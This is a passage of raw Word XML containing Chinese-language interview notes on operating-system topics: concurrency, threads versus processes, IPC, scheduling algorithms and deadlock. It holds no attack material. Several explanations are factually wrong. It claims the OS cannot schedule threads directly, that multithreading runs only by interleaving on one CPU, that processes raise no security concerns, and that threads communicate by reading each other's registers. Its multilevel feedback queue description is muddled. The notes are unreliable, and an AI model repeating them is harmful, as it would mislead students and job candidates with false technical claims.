          <w:top w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="DDDDDD" w:sz="2" w:space="21"/>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总体来说，并发强调的是多个任务之间的交替执行，而并行则强调的是多个任务的同时执行。在实际应用中，通常需要根据不同的场景来选择并发或并行的方式，以达到更好的性能和效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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同步、异步、阻塞、非阻塞的概念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同步（synchronous）和异步（asynchronous）是指两种不同的通信方式。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在同步通信中，通信的两个端点必须按照一定的协议约定好相互通信的时间，一旦开始通信，就必须等待对方回应后才能继续后续操作，直到整个通信过程完成。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在异步通信中，通信的两个端点不需要事先协定好通信的时间，发送方发送完消息后，可以继续进行其他操作，而接收方会在消息到达后立即通知发送方，然后继续处理其他任务。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阻塞（blocking）和非阻塞（non-blocking）则是指程序在执行I/O操作时的状态。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在阻塞I/O中，当程序进行I/O操作时，它会一直等待直到该操作完成后才会继续执行下一步操作，期间程序会被“阻塞”住。</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在非阻塞I/O中，当程序进行I/O操作时，它会立即返回并执行后续操作，而不会等待I/O操作完成。程序可以在后续的某个时间点再次查询I/O操作是否完成，并取回相应的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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什么是线程上下文</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线程上下文（Thread context）是指线程在执行过程中所处的状态和环境。线程的上下文包括线程栈、寄存器状态、程序计数器、堆栈指针、优先级、状态等信息。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操作系统创建一个新线程时，它会为线程分配一个独立的上下文，以便线程能够独立地执行其任务。线程上下文的切换是指在多任务环境下，操作系统将正在运行的线程的上下文保存到内存中，然后加载另一个线程的上下文，使其可以继续执行。这个过程是由操作系统的调度器负责完成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多线程编程中，了解线程上下文的概念非常重要，因为它涉及到线程的切换、状态保存和恢复等操作。同时，在编写高性能、可靠的多线程应用程序时，需要了解线程上下文的影响，以避免线程之间的竞争和死锁等问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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线程上下文的作用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线程上下文在多线程编程中扮演着重要的角色，它的作用主要有以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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线程切换：当操作系统调度器切换线程时，需要保存当前线程的上下文，并恢复另一个线程的上下文，以便新线程能够继续执行。线程上下文的切换是多任务操作系统实现多线程的基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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线程状态维护：线程上下文中包含了线程的状态信息，如线程的优先级、运行状态、堆栈指针等。操作系统可以根据线程上下文中的这些信息来管理线程的运行状态，如启动、挂起、恢复、终止等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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间通信：线程之间通信的方式有很多，其中一种方式就是通过共享内存来传递数据。在线程上下文中，线程的栈和寄存器状态都包含了线程的局部变量和函数调用信息，这些信息可以被其他线程读取和修改，从而实现线程间的数据共享和通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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调试和错误处理：线程上下文可以提供程序调试和错误处理的信息，例如当程序发生异常或错误时，可以通过线程上下文中的堆栈信息来定位错误的位置和原因。</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总之，线程上下文是多线程编程中的重要概念，它可以帮助程序员理解和管理线程的状态和行为，从而编写高效、可靠的多线程应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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进程和线程的基本概念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进程和线程是计算机操作系统中的两个基本概念，它们是用来管理和调度计算机系统中的任务和资源的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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进程(Process)：进程是指在操作系统中正在运行的程序实例。每个进程都有独立的地址空间、代码段、数据段和堆栈，它们之间相互独立，不能直接访问对方的内存空间。一个进程可以包含多个线程，但至少有一个主线程。进程可以通过系统调用来申请和释放资源，例如内存、文件、网络等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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线程(Thread)：线程是进程中的一个独立执行单元，它与进程共享进程的地址空间和资源，可以访问同一份数据。一个进程可以包含多个线程，线程之间共享进程的资源，每个线程有自己的栈和程序计数器(PC)，可以独立执行不同的代码段。多线程可以提高系统的并发性能，减少系统开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进程和线程的关系是，一个进程可以包含多个线程，线程是进程中的独立执行单元。线程是轻量级的进程，相比进程更加轻便、快速，可以提高系统的并发性能和响应速度。但线程也需要共享进程的资源，需要通过锁、信号量等机制来进行同步和互斥，避免数据竞争和冲突。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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进程与线程的区别？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进程（Process）和线程（Thread）是操作系统中的两个核心概念，它们都是操作系统分配处理器时间的基本单位。它们的主要区别如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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资源占用：进程是操作系统分配资源的最小单位，每个进程都有自己的地址空间、内存、文件描述符、信号处理器等系统资源；而线程是在进程内部运行的轻量级实体，它们共享进程的资源，比如内存和文件描述符等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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调度：进程是操作系统中的一个独立的执行单元，它们可以被操作系统分配处理器时间，并且可以在不同的 CPU 上执行；而线程是在进程内部调度的执行单元，它们不能直接被操作系统调度，而是由进程内的调度器进行调度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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并发性：在多处理器系统中，多个进程可以同时执行，每个进程在不同的 CPU 上运行；而多线程的并发性是通过在单个 CPU 上交替执行多个线程来实现的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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通信：不同的进程之间通常通过进程间通信（IPC）来进行通信；而在同一进程内的线程之间可以直接共享内存和变量等数据结构来进行通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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安全性：由于线程共享进程的资源，因此在多线程编程中需要注意线程安全问题；而不同进程之间的资源相互独立，因此不需要担心进程间的安全问题。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总之，进程和线程都是操作系统中的重要概念，它们在不同的应用场景中有着不同的优势和劣势。在设计和开发应用程序时，需要根据具体的需求选择合适的并发模型来实现程序的并发执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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为什么有了进程，还要有线程呢？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虽然进程是计算机中最基本的资源分配单位，但是它的创建、撤销和切换都需要耗费很大的系统资源和时间，同时进程间的通信和同步也需要较为复杂的机制和开销。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相比之下，线程是一种轻量级的进程，它与进程类似，也是计算机中的基本执行单位，但是线程的创建、撤销和切换比进程要快很多，因为线程的资源开销较小，多个线程可以共享进程的资源，同时线程间的通信和同步也更加简单、高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引入线程可以有效地提高计算机系统的并发性能和响应速度，减少系统开销，提高系统资源的利用率。同时，线程也可以用来实现一些复杂的任务，例如并行计算、异步编程等，这些任务通常比单一进程更加高效、灵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虽然进程和线程都是计算机系统中的重要资源分配单位，但是它们有各自的特点和适用场景。在实际应用中，需要根据具体的需求和系统性能来选择合适的进程和线程数目，并合理利用它们来实现高效的并发编程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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进程的状态转换</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在操作系统中，一个进程的状态通常有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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新建状态（New）：当一个进程被创建时，它处于新建状态。此时，操作系统正在为进程分配资源，并初始化进程控制块（PCB）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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就绪状态（Ready）：当进程已经获得了所有需要的资源，可以开始执行时，进程进入就绪状态。此时，操作系统会将进程的PCB插入到就绪队列中，等待CPU分配时间片。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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运行状态（Running）：当进程获得CPU时间片并开始执行时，进程进入运行状态。此时，进程占用CPU资源并执行指令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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阻塞状态（Blocked）：当进程需要等待某个事件发生时，进程进入阻塞状态。例如，等待用户输入、等待文件读写、等待网络数据等。此时，进程会释放CPU资源，并将自己从就绪队列中移除，等待事件发生后重新进入就绪状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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终止状态（Terminated）：当进程执行完所有指令并结束时，进程进入终止状态。此时，操作系统会回收进程所占用的资源，并将其PCB从系统中删除。</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一个进程在不同状态之间转换的过程称为进程状态转换。进程状态转换通常是由进程自身的行为或外部事件触发的，例如进程主动请求资源、等待事件发生、时间片用完等。不同的状态转换需要操作系统内部的相应机制来实现，例如进程调度、中断处理、信号处理等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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进程间的通信方式有哪些？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进程间通信（IPC）是指操作系统提供的用于不同进程之间进行数据交换和共享资源的机制。常见的进程间通信方式有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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管道（Pipe）：管道是一种半双工的通信方式，它可以在两个相关进程之间传递数据。管道有两种类型：匿名管道和命名管道。匿名管道只能在具有亲缘关系的进程之间使用，而命名管道可以在不同进程之间共享。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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消息队列（Message Queue）：消息队列是一种在进程之间传递数据的方式，它是一个消息列表，进程可以往队列中写入消息，其他进程可以从队列中读取消息。消息队列是一种异步通信方式，不需要直接建立连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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共享内存（Shared Memory）：共享内存是一种进程间通信的高效方式，它可以使多个进程共享同一段物理内存。进程可以将数据写入共享内存，其他进程也可以读取该内存中的数据。但是，共享内存的使用需要考虑进程间同步和互斥的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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信号量（Semaphore）：信号量是一种计数器，用于控制多个进程对共享资源的访问。进程可以通过信号量来对共享资源进行加锁和解锁。信号量是一种进程间同步的机制，可以避免竞争条件和死锁问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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套接字（Socket）：套接字是一种用于网络编程的通信方式，可以在不同主机上的进程之间进行通信。套接字可以用于不同主机上的进程之间的通信，也可以用于同一主机上的进程之间的通信。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总之，不同的进程间通信方式有各自的优缺点，选择合适的通信方式需要根据具体的应用场景和需求来决定。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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线程间的通信方式有哪些？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线程间通信（IPC）是指不同线程之间进行数据交换和共享资源的机制。常见的线程间通信方式有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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锁（Lock）：锁是一种常用的线程同步机制，它可以防止多个线程同时访问共享资源。常见的锁有互斥锁、读写锁、自旋锁等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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条件变量（Condition Variable）：条件变量是一种用于线程间同步的机制，它可以让一个线程在某个条件成立时等待，直到另一个线程发出信号后再继续执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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信号量（Semaphore）：信号量是一种计数器，用于控制多个线程对共享资源的访问。线程可以通过信号量来对共享资源进行加锁和解锁。信号量是一种进程间同步的机制，也可以用于线程间同步。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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事件（Event）：事件是一种线程同步的机制，它可以让一个线程等待另一个线程发出信号后再继续执行。事件有两种状态：有信号和无信号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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管道（Pipe）：管道是一种进程间通信的方式，但也可以用于线程间通信。线程可以通过管道来传递数据和共享资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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消息队列（Message Queue）：消息队列是一种进程间通信的方式，但也可以用于线程间通信。线程可以通过消息队列来传递数据和共享资源。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总之，线程间通信的方式和进程间通信的方式有一些相似之处，但也有一些不同。在选择线程间通信方式时，需要根据具体的应用场景和需求来决定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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进程的调度算法有哪些？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在操作系统中，进程调度算法是用来决定在多个就绪状态进程之间如何分配CPU资源的。常用的进程调度算法有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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先来先服务（FCFS）：按照进程到达的先后顺序进行调度，先到先服务。这种算法的优点是简单、公平，但容易产生饥饿现象，长作业等待时间较长。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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最短作业优先（SJF）：根据进程所需的CPU时间进行排序，优先执行需要时间最短的进程。这种算法可以最小化平均等待时间，但难以预测作业运行时间，可能产生长作业等待的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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优先级调度：为每个进程分配一个优先级，优先级高的进程先执行。优先级可以是静态的，也可以是动态的，根据进程的重要性、紧急程度等指标来动态调整优先级。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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时间片轮转（RR）：将CPU时间分为若干个时间片，每个进程轮流执行一个时间片，轮流执行直到进程完成或被阻塞。这种算法能够保证公平性和响应速度，但可能会导致上下文切换次数较多，进程响应时间长。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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多级反馈队列（MFQ）：将就绪队列划分为多个级别，每个级别分配不同的时间片，优先级高的进程在低级队列中执行完后可以进入高级队列，优先级低的进程可能会被抢占。这种算法可以兼顾公平性和响应速度，并能够适应不同类型的进程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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什么是死锁？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死锁是指在多进程或多线程系统中，由于竞争有限的资源（如内存、文件、网络、打印机等）而导致的一种互相等待的现象，各进程或线程都在等待其他进程或线程所占用的资源，从而形成一个死循环，导致所有进程或线程都无法继续执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死锁通常由以下四个必要条件引起：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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互斥条件：某些资源一次只能被一个进程或线程占用，例如打印机、硬盘等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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请求与保持条件：一个进程或线程在请求一个已经被其他进程或线程占用的资源时，会保持自己占用的资源不释放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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不剥夺条件：一个进程或线程占用的资源不能被其他进程或线程强制剥夺，只能由占用者主动释放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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循环等待条件：存在一组进程或线程，每个进程或线程都在等待下一个进程或线程所占用的资源，形成了一个循环等待的状态。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为避免死锁，可以采取以下措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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避免使用过多的锁，尽量使用非竞争性的锁，例如读写锁、自旋锁等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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破坏互斥条件，允许多个进程或线程同时访问某些资源，例如利用分布式锁、共享内存等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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破坏请求与保持条件，即在获取新的资源之前先释放已经占用的资源，避免产生互相等待的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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破坏不可剥夺条件，允许系统强制剥夺某些资源，例如设置超时时间、强制释放等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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破坏循环等待条件，通过资源分配的有序性避免进程之间形成环路，例如给资源分配一个全局的序号，按序号顺序获取资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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产生死锁的原因？</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死锁是多个进程或线程因为相互等待对方释放资源而被阻塞无法继续执行的状态，通常需要满足以下四个必要条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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互斥条件：某些资源一次只能被一个进程或线程占用，例如打印机、硬盘等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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请求与保持条件：一个进程或线程在请求一个已经被其他进程或线程占用的资源时，会保持自己占用的资源不释放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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不剥夺条件：一个进程或线程占用的资源不能被其他进程或线程强制剥夺，只能由占用者主动释放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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循环等待条件：存在一组进程或线程，每个进程或线程都在等待下一个进程或线程所占用的资源，形成了一个循环等待的状态。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当以上四个条件都被满足时，就有可能发生死锁。例如，当两个进程分别占用了A和B两个资源，并且各自还需要另一个资源才能继续执行时，就会陷入死锁状态。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除此之外，死锁还可能由以下原因产生：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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系统资源不足：如果系统中的某些资源已经被其他进程或线程占用，并且当前请求资源的进程或线程无法获取到足够的资源，就会陷入死锁状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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进程或线程的顺序问题：如果多个进程或线程之间的执行顺序不当，也有可能导致死锁的产生。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为避免死锁，需要在设计系统时注意这些问题，采用合适的算法和策略来避免死锁的发生。例如，可以采用资源预分配、资源有序性分配、超时机制等措施来避免死锁的发生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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怎么预防死锁？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为了预防死锁的发生，可以采取以下几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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资源分配策略：采用资源分配策略，如资源优先级分配、资源预分配、资源有序性分配等。例如，资源优先级分配可以让进程或线程按照一定的优先级获取资源，避免资源被持有时间过长导致其他进程或线程等待时间过长，从而减少死锁的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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破坏循环等待条件：避免出现循环等待条件。例如，可以采用资源有序性分配，让每个进程或线程按照一定的顺序获取资源，避免形成循环等待的状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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超时机制：设置超时机制，当进程或线程等待资源的时间超过一定的时间限制时，自动放弃当前的资源请求，释放已经占用的资源，避免资源被占用时间过长导致死锁的发生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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死锁检测和恢复：通过系统的死锁检测算法来检测死锁的发生，一旦检测到死锁，就采取相应的措施进行恢复。例如，可以通过抢占资源、撤销进程等方式来打破死锁，释放资源。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预防死锁的发生需要在设计系统时注意避免死锁产生的必要条件，采用合适的算法和策略来避免死锁的发生。同时，需要建立一套完善的死锁检测和恢复机制，及时发现和解决死锁问题，确保系统的稳定运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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怎么解除死锁？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解除死锁的方法主要有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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抢占资源：当系统发生死锁时，可以采取抢占资源的策略，即强制终止一个或多个进程或线程，从而释放其占用的资源。抢占资源的策略需要根据具体情况谨慎使用，以避免造成不必要的损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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撤销进程：当系统发生死锁时，可以撤销其中一个或多个进程或线程，释放其占用的资源。撤销进程的策略需要根据具体情况谨慎使用，以避免对系统造成不必要的影响。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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回滚操作：当系统发生死锁时，可以采用回滚操作，即撤销一部分或全部已经执行的操作，从而恢复系统到死锁前的状态，避免死锁的发生。回滚操作需要考虑其对系统和用户的影响，以确保操作的合理性和正确性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
